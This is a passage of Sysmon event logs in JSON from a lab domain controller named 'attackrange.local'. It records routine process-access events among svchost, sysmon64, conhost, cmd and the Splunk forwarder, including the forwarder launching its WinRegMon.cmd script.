C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3671,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3672,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3673,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3674,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3675,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3676,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010189B0500}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010189B0500}","TargetProcessId":"2252","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3677,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.738\r\nProcessGuid: {41C8662E-1FF7-5F25-0000-0010F39C0500}\r\nProcessId: 3008\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.738","ProcessGuid":"{41C8662E-1FF7-5F25-0000-0010F39C0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3678,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010F39C0500}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program 